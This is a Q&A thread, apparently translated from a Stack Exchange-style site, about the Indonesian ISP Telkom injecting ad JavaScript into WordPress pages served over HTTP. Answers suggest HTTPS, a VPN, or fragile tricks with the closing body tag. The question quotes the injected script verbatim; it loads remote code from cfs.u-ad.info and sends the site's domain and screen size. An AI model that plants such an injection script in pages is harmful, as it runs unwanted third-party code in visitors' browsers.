如何清除通过 ISP 注入的 wordpress 广告注入

How to clean up ads injection on wordpress which injected through ISP

我的网站被这样的脚本注入:

    <script>function netbro_cache_analytics(fn, callback) {setTimeout(function() 
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var 
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r 
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + 
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" + 
"&idc_r="+idc_glo_r + "&domain="+document.domain + 
"&sw="+screen.width+"&sh="+screen.height;var bsa = 
document.createElement('script');bsa.type = 'text/javascript';bsa.async = 
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
    </html>

u-ad.info 属于管理我的 ISP (TELKOM) 的公司。我向他们抱怨过,但它永远不会解决问题。我正在使用 WordPress。如何清理该脚本或阻止该脚本注入?

错误的 ISP! :D

您无法清除该脚本,因为它是在通过您的 ISP 服务器时被注入的。您只能在浏览器级别阻止它。阅读此 https://askubuntu.com/q/64303/224951。遗憾的是,所有使用相同 ISP 的网站访问者都将获得相同的注入页面。

我认为 Google 不会将您的网站列入黑名单,因为它肯定没有使用您的 ISP,因此看不到注入的脚本。

将正文标签更改为大写。

我的实验表明,脚本注入器专门查找以小写字母书写的 body 标签。 虽然,我不确定这种情况会持续多久。

http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer 查看我的解决方案 只是改变

</body>

</Body>

根据我的经验,您可以使用 https 协议或使用此技巧来避免从您的 ISP 加载脚本:P

<!-- </body></html> -->

在您的 'real' </body></html> 标签上方添加代码,开始吧!

在 HTML 的开头或结尾插入下面的代码。

<script type="text/javascript">
    $(document).ready(function(){
        $('body').append("</bo"+"dy>");
    });
</script>

但请确保您的 HTML 代码不包含 </body> 结束标记并在 <head> 标记中包含 jQuery。

示例:

完整 HTML

<html>
    <title>Foo bar</title>
    <head></head>
    <body>Lorem Ipsum</body>
</html>

成为

<html>
    <title>Foo bar</title>
    <head>
        <script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
    </head>
    <body>Lorem Ipsum
        <script type="text/javascript">
        $(document).ready(function(){
            $('body').append("</bo"+"dy>");
            });
        </script>
</html>

没有 </body> 结束标记。 ISP 上的 HTTP 过滤器将 grep </body></Body> 或任何 <body> 结束标记,然后在 <body> 结束标记之前注入 JavaScript 代码,这样他们的广告就会出现任何 使用 HTTP 协议的网站。

使用 HTTPS(如果服务器提供),或使用 VPN/SSH Tunneling/Secure 代理。所以所有的问题都会很干净。 ISP 通过提取所有压缩、注入而不是压缩回数据来注入广告和分析脚本。它将对您的互联网连接配额额外收费。

有一个非常简单的方法可以防止脚本注入工作。

只需在 </body> 标签之前添加此脚本即可。

<script>
//</body>
</script>

此图为使用前后对比图。

使用前:

使用后:

如果您使用 wordpress,只需确保安装了插件以允许您在页脚部分编写该脚本。

在 ISP TELKOM 知道之前就这样做。

更新:Telkom ISP 已经检测到 </body></html> 是否在评论中。
我的解决方案:

完全没有</body></html>
让浏览器自行关闭标签

已经过测试并且在 2018 年 12 月运行

谢谢